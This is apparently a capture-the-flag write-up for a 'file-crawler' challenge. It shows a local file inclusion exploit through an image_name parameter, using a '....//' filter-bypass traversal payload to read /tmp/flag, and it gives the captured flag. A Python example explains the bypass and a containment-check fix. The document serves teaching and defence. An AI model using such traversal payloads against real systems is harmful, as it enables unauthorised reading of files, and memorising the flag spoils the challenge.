file-crawler

Find the vulnerability and get the flag. The flag is located in a temporary folder.

First, visit the site and see what it looks like. This is a basic web page, and if you view the source code you will find the source path of the image. I accessed the image and then tried some local file inclusion payloads to see the content of another file on the local machine.

Local File Inclusion (LFI) is a common vulnerability that allows reading the content of a file on the local machine.

After some tries I received the flag using a filter bypass trick. The description says the flag is located in a temporary folder, so it might be /tmp/flag.

http://34.159.187.220:32586/local?image_name=....//....//....//....//....//....//tmp/flag
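Why the `....//` form gets through, and what a fix looks like, shown as an added example that is not the challenge's own code. The challenge source is not shown, so the single-pass removal of `../` in `naive_sanitize` is an assumption about the filter, and `BASE_DIR` and all function names are hypothetical.

```python
import os

# Hypothetical image root; the real application's directory is not on the page.
BASE_DIR = "/srv/app/static/images"


def naive_sanitize(name: str) -> str:
    """Assumed filter: delete every '../' in a single pass.

    In '....//' the only match is the middle '../'. Removing it leaves
    '..' + '/', so the filter itself rebuilds a traversal sequence.
    """
    return name.replace("../", "")


def resolve_naive(name: str) -> str:
    """Vulnerable: trusts the filtered string and joins it to the base."""
    return os.path.normpath(os.path.join(BASE_DIR, naive_sanitize(name)))


def resolve_safe(name: str) -> str:
    """Hardened: do not rewrite the input. Resolve it, then check that the
    result is still inside the base directory, and reject it otherwise."""
    base = os.path.realpath(BASE_DIR)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes the image directory")
    return target


if __name__ == "__main__":
    # The parameter value from the URL above.
    payload = "....//....//....//....//....//....//tmp/flag"
    print("after filter :", naive_sanitize(payload))
    print("naive resolve:", resolve_naive(payload))
    # With no filter, '....' is just an odd directory name under the base.
    print("safe resolve :", resolve_safe(payload))
    for bad in ("../../../../../../tmp/flag", "/tmp/flag"):
        try:
            resolve_safe(bad)
        except ValueError as exc:
            print("rejected     :", bad, "->", exc)
```

The containment check also covers absolute paths, because `os.path.join` discards the base when the second argument starts with `/`.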

Flag

CTF{0caec419d3ad1e1f052f06bae84d9106b77d166aae899c6dbe1355d10a4ba854}
